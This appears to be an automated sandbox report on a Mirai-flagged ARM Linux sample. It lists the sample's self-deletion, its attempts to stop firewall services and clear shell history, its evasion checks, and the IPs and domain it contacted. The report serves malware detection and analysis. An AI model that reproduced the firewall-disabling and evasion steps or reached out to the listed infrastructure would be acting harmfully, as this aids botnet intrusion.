Source: submitted sample Stderr: Failed to stop iptables.service: Unit iptables.service not loaded.Failed to stop firewall.service: Unit firewall.service not loaded./bin/sh: 1: history: not found/bin/sh: 1: history: not found: exit code = 0

Hooking and other Techniques for Hiding and Protection
barindex
Sample deletes itself
Source: /usr/bin/rm (PID: 5437) File: /tmp/arm7.elf Jump to behavior
Reads CPU information from /sys indicative of miner or evasive malware
Source: /usr/bin/pkill (PID: 5452) Reads CPU info from /sys: /sys/devices/system/cpu/online Jump to behavior
Source: /usr/bin/pkill (PID: 5466) Reads CPU info from /sys: /sys/devices/system/cpu/online Jump to behavior
Source: /usr/bin/pkill (PID: 5471) Reads CPU info from /sys: /sys/devices/system/cpu/online Jump to behavior
Uses the "uname" system call to query kernel version information (possible evasion)
Source: /tmp/arm7.elf (PID: 5433) Queries kernel information via 'uname': Jump to behavior
Source: /bin/busybox (PID: 5642) Queries kernel information via 'uname': Jump to behavior
Source: /usr/bin/busybox (PID: 5660) Queries kernel information via 'uname': Jump to behavior
Source: /bin/busybox (PID: 5641) Queries kernel information via 'uname': Jump to behavior
Source: /usr/bin/busybox (PID: 5656) Queries kernel information via 'uname': Jump to behavior
Source: arm7.elf, 5433.1.000055aede7f7000.000055aede96e000.rw-.sdmp, arm7.elf, 5589.1.000055aede7f7000.000055aede96e000.rw-.sdmp Binary or memory string: U!/etc/qemu-binfmt/arm
Source: arm7.elf, 5433.1.000055aede7f7000.000055aede96e000.rw-.sdmp, arm7.elf, 5589.1.000055aede7f7000.000055aede96e000.rw-.sdmp Binary or memory string: /etc/qemu-binfmt/arm
Source: arm7.elf, 5433.1.00007ffe6d494000.00007ffe6d4b5000.rw-.sdmp, arm7.elf, 5589.1.00007ffe6d494000.00007ffe6d4b5000.rw-.sdmp Binary or memory string: /usr/bin/qemu-arm
Source: arm7.elf, 5433.1.00007ffe6d494000.00007ffe6d4b5000.rw-.sdmp, arm7.elf, 5589.1.00007ffe6d494000.00007ffe6d4b5000.rw-.sdmp Binary or memory string: oeix86_64/usr/bin/qemu-arm/tmp/arm7.elfSUDO_USER=saturninoPATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/binDISPLAY=:1.0XAUTHORITY=/run/user/1000/gdm/XauthoritySUDO_UID=1000TERM=xterm-256colorCOLORTERM=truecolorLOGNAME=rootUSER=rootLANG=en_US.UTF-8SUDO_COMMAND=/bin/bashHOME=/rootMAIL=/var/mail/rootSUDO_GID=1000SHELL=/bin/bash/tmp/arm7.elf

Stealing of Sensitive Information
barindex
Yara detected Mirai
Source: Yara match File source: arm7.elf, type: SAMPLE
Source: Yara match File source: 5433.1.00007fcc80017000.00007fcc8003d000.r-x.sdmp, type: MEMORY
Source: Yara match File source: 5589.1.00007fcc80017000.00007fcc8003d000.r-x.sdmp, type: MEMORY

Remote Access Functionality
barindex
Yara detected Mirai
Source: Yara match File source: arm7.elf, type: SAMPLE
Source: Yara match File source: 5433.1.00007fcc80017000.00007fcc8003d000.r-x.sdmp, type: MEMORY
Source: Yara match File source: 5589.1.00007fcc80017000.00007fcc8003d000.r-x.sdmp, type: MEMORY

No Screenshots

  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
185.125.190.26
 unknown United Kingdom
41231 CANONICAL-ASGB false
156.238.224.214
 octopus1337.geek Seychelles
394281 XHOSTSERVERUS false
212.118.43.167
 unknown Russian Federation
25308 CITYLAN-ASRU false

Contacted Domains

Name IP Active
octopus1337.geek 156.238.224.214 true